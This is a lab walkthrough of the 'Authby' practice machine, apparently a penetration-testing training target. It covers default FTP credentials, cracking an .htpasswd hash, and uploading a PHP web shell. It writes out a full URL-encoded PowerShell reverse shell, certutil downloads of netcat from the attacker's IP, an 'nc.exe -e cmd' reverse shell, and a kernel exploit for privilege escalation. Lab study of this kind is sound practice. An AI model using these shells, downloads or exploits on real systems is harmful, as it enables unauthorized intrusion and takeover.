Authby (Intermediate, Windows)

[WDavid404]

Keypoints：

• Some windows OS doesn:t support wget, powershell
• Some windows OS in the target host is 32bit --> so nc64.exe doesn:t work

[WDavid404]

PORT     STATE SERVICE            REASON          VERSION
21/tcp   open  ftp                syn-ack ttl 125 zFTPServer 6.0 build 2011-10-17
242/tcp  open  http               syn-ack ttl 125 Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
3145/tcp open  zftp-admin         syn-ack ttl 125 zFTPServer admin
3389/tcp open  ssl/ms-wbt-server? syn-ack ttl 125
| rdp-ntlm-info: 
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2024-07-31T04:13:35+00:00
|_ssl-date: 2024-07-31T04:13:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Issuer: commonName=LIVDA

search exploit info for zftp --> zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal

22/tcp: Login FTP with anonymouse --> Cannot download files due to permisison. List username on /accounts dir

242/tcp: --> Try admin:admin --> Failed... --> Try using account name info to login --> Failed

Try login FTP with acccount name info (Offsec, Admin) --> Can login with admin:admin Download all files and confirm the content. cat .htpasswd --> offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

crack it

echo '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > hash
john  --wordlist=/usr/share/wordlists/rockyou.txt hash

--> elite

Login to 242/tcp page with offsec:elite --> --> Translate to English: "He who wants to be a nut from a nut breaks the nut!"

ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.156.46/FUZZ -H "Authorization: Basic b2Zmc2VjOmVsaXRl" --> No info

Try rdp login with offsec:elite -->failed

When login FTP with admin:admin, found that we can upload file to FTP! so, upload a php cmd file because in FTP, there is "index.php" that is we found after login to 242/tcp. so for the reverse shell php file, we can access it via IP:242/php_cmd.php?cmd=whoami --> works! Use powershell reverse command ....?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.205%27%2C80%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22 --> didn't work.

Try upload nc.exe and then use reverse shell via nc.exe wget 192.168.45.205/nc64.exe -O C:/windows/temp/nc64.exe --> didn't work

certutil -urlcache -f http://192.168.45.205/nc.exe  c:/users/public/downloads/nc.exe
certutil%20-urlcache%20-f%20http://192.168.45.205/nc64.exe%20%20c:/users/public/downloads/nc64.exe
c:/users/public/downloads/nc.exe -e cmd 192.168.45.205 4444

--> work! (Also tried other dir location but all failed:

• c:/users/public/desktop/ --> access deny
• c:/windows/temp/ --> no response on web browser and didn't work
• nc64.exe didn't work!!! because the target host is x86 system...
• wget is not supportted on the target host.
• powershell is not supportted on the target host. )

PE

systeminfo --->

Regarding windows kernel exploit, can use https://github.com/SecWiki/windows-kernel-exploits --> https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120

put x86.exe to FTP and use it to send nc reverse shell so we got a reverse shell as admin user